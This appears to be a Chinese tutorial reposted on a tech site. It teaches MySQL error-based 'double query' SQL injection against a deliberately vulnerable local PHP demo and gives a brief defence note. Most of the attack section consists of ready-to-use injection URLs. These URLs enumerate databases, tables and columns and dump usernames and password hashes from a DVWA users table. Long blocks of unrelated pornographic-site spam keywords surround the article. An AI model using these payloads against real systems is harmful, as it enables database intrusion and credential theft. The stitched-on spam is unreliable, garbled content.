精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

數(shù)據(jù)安全之雙查詢注入解析

安全 數(shù)據(jù)安全
介紹一下雙查詢注入,什么叫雙查詢注入,這個有點(diǎn)難以解釋,通俗的來說就是嵌套子查詢。我們理解一下子查詢,查詢的關(guān)鍵字是select,這個大家都知道。子查詢可以簡單的理解在一個select語句里還有一個select,里面的這個select語句就是子查詢。

介紹一下雙查詢注入,什么叫雙查詢注入,這個有點(diǎn)難以解釋,通俗的來說就是嵌套子查詢。我們理解一下子查詢,查詢的關(guān)鍵字是select,這個大家都知道。子查詢可以簡單的理解在一個select語句里還有一個select,里面的這個select語句就是子查詢。

這種方法適用于注入的時候沒有返回位,但是有返回位的時候也適用,不過又返回位的時候就不建議在、用這個啦!返回位就是你們union select 1,2,3,4,5,6,7,8 這里是8個字段

 

shuangchaxun1

 

這里顯示2,4,5,6,7,8就是返回位

另外,就是要有返回mysql錯誤提示,php返回錯誤提示有兩種,看下圖

這是mysql返回的錯誤

 

shuangchaxun2

 

這是php返回的錯誤

 

shuangchaxun3

 

雙注入的原理,簡單一句話原理就是有研究人員發(fā)現(xiàn),當(dāng)在一個聚合函數(shù),比如count函數(shù)后面如果使用分組語句就會把查詢的一部分以錯誤的形式顯示出來。

floor()和rand(),count()就不在多說啦

但是concat()函數(shù),就來說一下,concat是一個連接函數(shù),可以連接多個字符,例如

1concat("abc","123")="abc123"

并且支持ascii碼,例如:

1concat("abc",0x22,"123")=abc"123

(0×22就是雙引號,可以用來當(dāng)分隔符)

這里在mysql輸入

1select concat((select version()))

 

shuangzhuru4

 

在concat里執(zhí)行查詢要用括號括起來,同時要確定只返回 一條數(shù)據(jù),不然得用limit來保證只有一條結(jié)果 (limit 0,1 返回第一條)

如果這條語句添加from的話,就會返回表中的記錄的條數(shù),就是有多少條記錄就會返回多少次的版本號,看圖

 

shuangzhuru5

 

這里還沒有顯示完!!

因此

1select concat((select version()),floor(rand()*2)) from mysql.user;

(這里我用的是mysql中的mysql數(shù)據(jù)庫,user表有四條記錄 )

(小編注:rand()函數(shù)是生成0-1之間的小數(shù)隨機(jī)值,rand()*2是生成0-2之間的小數(shù)隨機(jī)數(shù),floor(rand()*2)就相當(dāng)于生成0/1兩個隨機(jī)值)

Attention,這里顯示的值是版本號加上rand()生成的,正確版本好是去掉后面的0或1

現(xiàn)在我們加上group by ,因?yàn)槿绻覀儚膄rom 某張表的話,可能里面就會有很多條記錄,然后就可能生成隨機(jī)值(據(jù)說是這樣的,如果不是,還望告知)

這里用information_schema.tables來弄,因?yàn)樗挠涗泬蚨?,如前一條語句,你就可以知道啦

 

shuangzhuru6

 

group by 一下多清爽啦

看語句中

1select concat((select version()),floor(rand()*2))a from information_schema.tables group by a;

這里加粗的a是把 as a 簡寫成 a 而已,說一下group by ,這個的作用就是把5.1.69-0ubuntu0.10.04.10 分為一組,5.1.69-0ubuntu0.10.04.11 的分為一組

(小編注:如果各位看官不知道這里是怎么回事,執(zhí)行一下

1select concat((select version()),floor(rand()*2)) from information_schema.tables

就清楚了)

最后就來到這個count()函數(shù)了,這個函數(shù)妙用可以看一下下圖

1select count(*),concat((select version()),floor(rand()*2))a from information_schema.tables group by a

 

shuangzhuru7

 

看到了沒有,返回了我們后面concat的內(nèi)容啦

ERROR 1062 (23000): Duplicate entry ’15.1.69-0ubuntu0.10.04.1′ for key ‘group_key’,我們看看phpmyadmin下比較詳細(xì)的報錯:

 

shuangchaxun21

 

說了這么多就為了這個而已!!

好了,給個小小demo(demo在本文最后)給你們,不過弄不出一個沒有顯示返回位的,所以就將就一下的

然后雙注入查詢是有固定公式的

1union select 1 from (select+count(*),concat(floor(rand(0)*2),( 注入爆數(shù)據(jù)語句))a from information_schema.tables group by a)b

這里將下面的demo設(shè)置數(shù)據(jù)庫的一些參數(shù)之后,保存成yi.php,我們的演示就正式開始了

這是正常的情況:

 

shuangzhuru8

 

加個單引號后

 

shuangzhuru9

 

這里說明有注入了,然后用order by 判斷字段咯,這里就截圖了(太麻煩啦),字段數(shù)是8個(其實(shí)不判斷也可以的,只要確定有注入就行啦)

1、先讀個數(shù)據(jù)庫的版本、用戶、當(dāng)前庫名

1http://127.0.0.1/yi.php?id=-1 union select 1 from (select count(*), concat(floor(rand()*2),(select concat(version(),0x22,user(),0x22,database())))a from information_schema.tables group by a)b

 

shuangzhuru10

 

這里數(shù)據(jù)庫版本:5.1.28-rc-community

用戶是:root@localhost

數(shù)據(jù)庫名:test

2、然后讀數(shù)據(jù)庫有哪些庫

1http://127.0.0.1/yi.php?id=-1 union select 1 from (select count(*), concat(floor(rand()*2),(select schema_name from information_schema.schemata limit 0,1))a from information_schema.tables group by a)b

 

shuangzhuru11

 

這里要注意,因?yàn)閟ql語句會返回多條記錄,所以要用limit來限制返回的條數(shù),limit 0,1是第一條記錄

limit 1,1是第二條記錄

(小編注:通過控制limit來逐條查看數(shù)據(jù)庫名稱,請忽略前面的0或是1)

3、然后看看有什么表

因?yàn)槲矣袀€dvwa的數(shù)據(jù)庫,所以就用那個來做示范啦

1http://127.0.0.1/yi.php?id=-1 union select 1 from (select+count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=0x64767761 limit 1,1))a from information_schema.tables group by a)b

加粗是dvwa的hex值,這樣得到dvwa的users的表

 

shuangzhuru12

 

4、然后看有什么字段

1http://127.0.0.1/yi.php?id=-1 union select 1 from (select count(*) ,concat(floor(rand(0)*2),(select column_name from information_schema.columns where table_name =0x7573657273 limit 0,1 ))a from information_schema.tables group by a)b

 

shuangzhuru13

 

然后修改limit的值,得到字段user,password

5、然后讀取字段的值

1http://127.0.0.1/yi.php?id=-1 union Select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user,0x22,password) from dvwa.users limit 0,1))a from information_schema.tables group by a)b

 

shuangzhuru14

 

這樣子就得到字段的值啦,然后提醒一下,要是跨庫讀取數(shù)據(jù),要寫成數(shù)據(jù)庫名然后.表名。因?yàn)楫?dāng)前數(shù)據(jù)庫是test,然后我讀的是dvwa庫的users的表,所以要寫成dvwa.users

好了基本就是這么多啦。

防范辦法:

一個是過濾啦(把’,”,union,select load_file,%,and等敏感字符都過濾啦)

另一個是參數(shù)化查詢,就是一種把查詢語句給固定死了,無論傳過來的值是什么,都只當(dāng)做變量來執(zhí)行查詢語句

demo的源碼:

  1. <?php 
  2. $dbuser = "root"
  3. $dbpwd = "";     //這里是mysql的密碼 
  4. $db = "test"
  5. $conn = mysql_connect("localhost",$dbuser,$dbpwdor die("error"); 
  6. mysql_select_db($db,$conn); 
  7. $id = $_GET['id']; 
  8. $query = "select * from test where id =$id"
  9. $result = mysql_query($queryor die(mysql_error()); 
  10. print_r(mysql_fetch_array($result)); 
  11. //簡單的寫一下而已 
  12. ?> 

[via@廣外(廣東外語外貿(mào)大學(xué))網(wǎng)絡(luò)安全小組_臺灣鴿]

責(zé)任編輯:藍(lán)雨淚 來源: 網(wǎng)絡(luò)安全攻防實(shí)驗(yàn)室
相關(guān)推薦

2020-08-30 14:34:42

Java語言安全編碼web安全

2010-09-30 09:11:01

2013-01-11 16:31:27

2021-05-08 15:22:31

網(wǎng)絡(luò)安全Web安全SQL

2012-11-14 17:18:58

2010-05-19 18:42:23

2013-07-27 14:14:25

2020-01-11 12:53:51

雙態(tài)IT智能運(yùn)維睿至大數(shù)據(jù)

2011-03-07 15:54:30

2021-07-15 06:43:12

Python數(shù)據(jù)結(jié)構(gòu)

2016-12-21 16:12:12

2009-08-11 17:30:46

2010-05-13 14:14:45

2020-06-08 08:25:50

據(jù)銷毀安全數(shù)據(jù)安全DSMM

2018-09-11 04:14:24

2020-02-07 09:32:08

數(shù)據(jù)安全數(shù)據(jù)資產(chǎn)管理安全風(fēng)險

2020-12-16 13:22:37

Web安全SQL工具

2022-03-18 14:44:14

數(shù)據(jù)安全端點(diǎn)安全防護(hù)

2024-01-01 16:16:26

2009-11-24 13:17:16

PHP安全驗(yàn)證數(shù)據(jù)
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號

亚洲欧美电影院| 日韩在线一区二区三区| 亚洲国产成人爱av在线播放| 91精品国产91久久久久麻豆 主演| 黄色一级大片在线免费看国产| 亚洲欧洲日本mm| 在线精品国产欧美| 国产精品99精品无码视亚| 性感女国产在线| 1024成人网| 蜜桃视频在线观看91| 在线观看国产精品入口男同| 韩日成人在线| 色狠狠av一区二区三区香蕉蜜桃| 极品人妻一区二区| 厕沟全景美女厕沟精品| 亚洲激情中文1区| 日产精品高清视频免费| 午夜精品久久久久久久99热黄桃| 另类国产ts人妖高潮视频| 久久精品国产久精国产一老狼| 久久久久麻豆v国产精华液好用吗 在线观看国产免费视频 | 麻豆久久久9性大片| 一级黄色大片免费| 国产精品乱看| 欧美另类极品videosbest最新版本| 无码人妻aⅴ一区二区三区 | 久久国产99| 欧美理论片在线观看| a级在线免费观看| 超碰成人97| 7799精品视频| 一区二区成人网| 国模精品视频| 亚洲香肠在线观看| 国产精品一二三在线观看| 国际av在线| 93久久精品日日躁夜夜躁欧美| 亚洲最大福利网| 伊人亚洲综合网| 老司机一区二区三区| 久久久久久国产精品| 国产传媒免费在线观看| 精品免费av| 日韩成人在线免费观看| 日本精品一二三区| 日韩中文字幕一区二区高清99| 欧美午夜一区二区三区| 国产在线观看福利| 成年男女免费视频网站不卡| 亚洲国产视频网站| 18黄暴禁片在线观看| 69xxx在线| 亚洲精品国产视频| 777久久精品一区二区三区无码| 无遮挡的视频在线观看| 国产精品丝袜一区| 亚洲欧洲日韩精品| 秋霞成人影院| 日韩理论在线观看| 吴梦梦av在线| 91麻豆一二三四在线| 日韩毛片在线免费观看| 日韩成人午夜影院| 天天色天天射天天综合网| 一级女性全黄久久生活片免费| 国产日韩视频在线播放| av免费在线观| 亚洲国产aⅴ天堂久久| 霍思燕三级露全乳照| 黄色视屏在线免费观看| 日韩欧美一区二区三区久久| 欧美综合在线观看视频| 亚州一区二区三区| 欧美日韩免费高清一区色橹橹| 黄色一级片免费的| 久久9999免费视频| 亚洲国产日韩欧美在线99| 亚洲精品视频大全| 欧美日韩国产在线观看网站 | 欧美日本免费一区二区三区| 天天干天天av| 一区中文字幕| 精品一区二区三区四区| 91免费在线看片| 欧美伊人久久| 欧洲亚洲免费视频| 一区二区三区午夜| 成人手机电影网| 欧美一区1区三区3区公司| 天天影视久久综合| 亚洲一区二区高清| 熟妇人妻无乱码中文字幕真矢织江| 亚洲国产综合在线观看| 欧美成人综合网站| 国产三级国产精品| 91精品99| 日韩美女免费观看| 国产手机视频在线| 337p粉嫩大胆噜噜噜噜噜91av | 国精品一区二区| 日韩av手机在线看| 国产成人精品白浆久久69| 久久婷婷成人综合色| japanese在线视频| 欧美三级网站| 日韩色在线观看| x88av在线| 国产精品videosex极品| 国产精品露脸自拍| 免费a级片在线观看| 国产精品久久久久久久久久久免费看 | 国产三级生活片| 婷婷激情久久| 欧美成人亚洲成人| 中文字幕人妻一区二区三区视频| 高清国产一区二区| 亚洲一区二区在线看| 亚洲最大成人| 国产校园另类小说区| 亚洲激情偷拍| 中文字幕一区二区不卡| 欧妇女乱妇女乱视频| 日本一区二区三区视频在线| 亚洲成人久久久久| 爱爱视频免费在线观看| 亚洲免费综合| 国产日韩欧美精品| 久久精品视频免费看| 色天天综合色天天久久| 日本一区二区免费视频| 91精品婷婷色在线观看| 国产精品久久激情| 欧洲毛片在线| 午夜精品久久久久久不卡8050| 97人人爽人人| 欧美日韩在线二区| 欧洲一区二区视频| 婷婷色在线视频| 一区二区免费在线播放| 亚洲精品www.| 欧洲grand老妇人| 人体精品一二三区| 无码精品视频一区二区三区 | 亚洲精品tv久久久久久久久| 亚洲国产欧美日本视频| 日韩精品在线免费观看| 国产污视频在线看| 成年人国产精品| 免费在线观看视频a| av综合网址| 欧美黑人性视频| 六月丁香色婷婷| 亚洲超丰满肉感bbw| 日本人妻一区二区三区| 国内在线观看一区二区三区| 99在线观看视频网站| 黄页网站在线观看免费| 日韩色视频在线观看| 久久黄色免费网站| 国产91丝袜在线观看| 777av视频| 天天久久夜夜| 国产精品久久av| 在线观看完整版免费| 欧美日韩精品欧美日韩精品| 精品视频第一页| 国产主播一区二区三区| 黄色特一级视频| 国产精品xxx在线观看| 韩剧1988在线观看免费完整版| 欧美一级特黄aaaaaa| 精品动漫一区二区三区| av直播在线观看| 日韩精品免费视频人成| 亚洲视频电影| 亚洲超碰在线观看| 久久久亚洲影院| 免费黄色片在线观看| 欧美三级一区二区| 天天色影综合网| 成人综合婷婷国产精品久久蜜臀| 国产h视频在线播放| 欧美精品第一区| 国产一区二区在线免费视频| 中中文字幕av在线| 亚洲国产中文字幕久久网| 国产亚洲欧美日韩高清| 17c精品麻豆一区二区免费| 老司机午夜av| 波多野结衣在线观看一区二区| 国产综合香蕉五月婷在线| 影音先锋中文在线视频| 日韩av在线直播| 在线视频免费观看一区| 亚洲伊人伊色伊影伊综合网| 亚洲午夜久久久久久久久红桃| 免费视频一区二区| 国内自拍中文字幕| 精品一区亚洲| 91在线免费看片| 怡红院成人在线| 美乳少妇欧美精品| 国产青青草在线| 精品国精品自拍自在线| 日韩国产亚洲欧美| 亚洲国产综合色| 成人在线观看免费高清| 成人激情校园春色| 91丨九色丨蝌蚪| 亚洲国产日韩欧美一区二区三区| 日韩精品不卡| 好吊妞视频这里有精品| 国产日韩欧美在线看| www在线观看黄色| www.久久色.com| 色久视频在线播放| 精品欧美乱码久久久久久1区2区| 最近中文字幕免费在线观看| 亚洲国产成人精品视频| 国产免费一区二区三区四区| 久久久亚洲综合| 婷婷五月精品中文字幕| 国产老妇另类xxxxx| 看欧美ab黄色大片视频免费| 国产偷自视频区视频一区二区| 正在播放一区| 欧美综合视频| 日韩免费av电影| 天天操综合520| 国产精品视频在线免费观看| 国产欧美视频在线| 国产精品你懂得| 激情开心成人网| 4k岛国日韩精品**专区| av资源新版天堂在线| 欧美国产精品日韩| 影音先锋在线视频| 九九热r在线视频精品| 欧美成人hd| 日韩中文字在线| 亚洲视频tv| 在线成人激情黄色| 黄色片在线免费看| 亚洲人成五月天| 免费黄网站在线观看| 精品视频久久久久久| 日韩在线视频观看免费| 精品美女一区二区三区| 国产高清免费在线观看| 日韩一级片在线观看| 91丨porny丨在线中文| 欧美视频在线一区二区三区 | 亚洲国产精品va在看黑人| 亚洲毛片欧洲毛片国产一品色| 日韩一区二区在线免费观看| 99视频免费看| 精品精品国产高清a毛片牛牛| 亚洲av综合色区无码一区爱av| 欧美一级艳片视频免费观看| 精品国产av一区二区三区| 日韩欧美aaaaaa| 日韩一卡二卡在线| 亚洲乱码国产乱码精品精| 青草久久伊人| 尤物精品国产第一福利三区| 2019中文字幕在线视频| 久久亚洲成人精品| 色呦呦在线免费观看| 久久久亚洲天堂| 欧美7777| 91精品视频观看| 一区二区三区欧洲区| 精选一区二区三区四区五区| 国产一区二区三区91| 一区二区三区四区| 欧美成人日本| 欧美s码亚洲码精品m码| 免费观看在线色综合| 无套内谢丰满少妇中文字幕| 成人动漫一区二区在线| 91久久免费视频| 亚洲欧洲av另类| 日本网站免费观看| 91九色02白丝porn| 国产浮力第一页| 国产视频在线观看一区二区| 亚洲成人三级| 午夜精品视频网站| 国产精品黄色片| 国产九色精品| 成人影视亚洲图片在线| 无码人妻精品一区二区蜜桃网站| 久久高清国产| 国产精品19p| 国产亚洲一区二区三区四区| 久久久久97国产| 色婷婷精品久久二区二区蜜臂av| 国产三级第一页| 精品亚洲国产成av人片传媒 | 欧美激情欧美激情在线五月| 欧美黑人一区| 99久久伊人精品影院| 精品久久影院| 免费看黄在线看| 久久99精品久久久| 亚洲中文字幕无码av| 国产精品视频一二三| 91在线看视频| 91精品国产综合久久婷婷香蕉| 青青草免费在线| 欧美激情视频给我| av成人在线观看| 久久精品五月婷婷| 国产精品va| 6080国产精品| 国产女主播一区| www.伊人久久| 精品福利视频一区二区三区| 欧美成人三区| 国产精品一区二区久久久久| 色狼人综合干| 国产一区二区片| 国产一区二区伦理| www.4hu95.com四虎| 日韩欧美在线字幕| 天天干天天草天天射| 欧美大片在线看免费观看| www.精品国产| 日韩美女一区| 日韩精品成人一区二区三区| 中文字幕日韩三级片| 亚洲综合成人在线视频| 国产日韩欧美视频在线观看| 色哟哟网站入口亚洲精品| 欧美成人精品三级网站| 久久精品magnetxturnbtih| 国模大胆一区二区三区| wwwxxxx在线观看| 亚洲精品第1页| 国产喷水福利在线视频| 久久精品国产成人| **日韩最新| 中文字幕日韩一区二区三区 | 国产激情久久久久| 亚洲精品亚洲人成在线| 国产日产欧美视频| 97久久人人超碰| 久久午夜免费视频| 亚洲精品成人久久电影| 91九色国产在线播放| 久久国产精品-国产精品| 国产精品资源| 欧美另类z0zx974| 欧美艳星brazzers| 91官网在线| 91精品在线观| 午夜电影亚洲| 伊人久久一区二区三区| 精品久久久久久久久久久久久| 人妻无码中文字幕| 51精品国产黑色丝袜高跟鞋 | 2021狠狠干| 国产麻豆欧美日韩一区| 免费无遮挡无码永久在线观看视频| 日韩一区二区免费在线观看| 肉肉视频在线观看| 精品亚洲欧美日韩| 日本网站在线观看一区二区三区| 公肉吊粗大爽色翁浪妇视频| 欧美精品久久99| 美女精品导航| 欧美综合77777色婷婷| 久久99国产精品麻豆| 九九精品在线观看视频 | h视频网站在线观看| 成人动漫网站在线观看| 国产一区二区三区四区三区四 | 国产精品日日摸夜夜摸av| 国产精品高潮呻吟av| 欧美激情视频播放| 国产精品亚洲人成在99www| 中文字幕视频三区| 亚洲一二三区在线观看| 国产毛片在线| 99久久伊人精品影院| 久久五月激情| 日韩影院一区二区| 亚洲欧美激情在线视频| 祥仔av免费一区二区三区四区| 免费看欧美黑人毛片| 久久久国产午夜精品| 国产99对白在线播放| 日本乱人伦a精品| 一区二区三区在线| 添女人荫蒂视频| 日韩一区二区三区免费观看| 深夜成人影院| 国产小视频免费| 中文字幕av一区二区三区免费看|